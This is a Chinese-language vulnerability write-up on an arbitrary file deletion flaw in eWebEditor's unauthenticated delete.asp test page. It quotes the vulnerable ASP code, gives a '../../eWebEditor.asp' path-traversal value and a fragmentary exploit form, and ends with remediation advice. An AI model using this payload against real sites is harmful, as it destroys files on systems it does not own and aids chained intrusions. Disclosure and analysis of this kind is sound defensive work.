|
|
此漏洞存在于Example\NewsSystem目录下的delete.asp文件中,这是ewebeditor的测试页面,无须登陆可以直接进入,看这些代码:
\“ 把带“|“的字符串转为数组
Dim aSavePathFileName
aSavePathFileName = Split(sSavePathFileName, “|“)
\“ 删除新闻相关的文件,从文件夹中
Dim i
For i = 0 To UBound(aSavePathFileName)
\“ 按路径文件名删除文件
Call DoDelFile(aSavePathFileName(i))
Next
而aSavePathFileName是前面从数据库取出来的:
sSavePathFileName = oRs(“D_SavePathFileName“)
看看D_SavePathFileName是怎么添加到数据库里的,在addsave.asp(modifysave.asp)里:
sSavePathFileName = GetSafeStr(Request.Form(“d_savepathfilename“))
...
oRs(“D_SavePathFileName“) = sSavePathFileName
居然过滤了,是GetSafeStr函数,再看看这个函数,在Startup.asp里:
Function GetSafeStr(str)
GetSafeStr = Replace(Replace(Replace(Trim(str), “\““, ““), Chr(34), ““), “;“, ““)
End Function
无 语,这不是过滤字符型注入的函数么?放这里什么用也没有啊!既然路径没有过滤,那就可以直接定义了,构造一个提交页面,其中 d_savepathfilename自己任意赋值(要删除多个文件,用|隔开即可)。试试../../eWebEditor.asp,提交后删除该新 闻,于是主目录下的eWebEditor.asp不见了!
下面给出利用的htm:
eWebEditor删除文件
新闻列表 | 增加新闻
增加新闻
method=“post“ name=“myform“>
| 要删的文件(相对路径就可以了): | | | 新闻标题(随便填): | | | 标题图片: | 无
当编辑区有插入图片时,将自动填充此下拉框 | | 新闻内容(随便填): | |
删除文件漏洞一般是配合其他漏洞使用的,比如目录遍历!
解决方法:删除测试文件目录,把默认的登录密码修改,或直接删除管理页面,因为,我们配置好,很少再改动的,最好把一些后台文件压缩后,删除。
(责任编辑:网络) |
|
发表于 2020-10-28 00:00:00
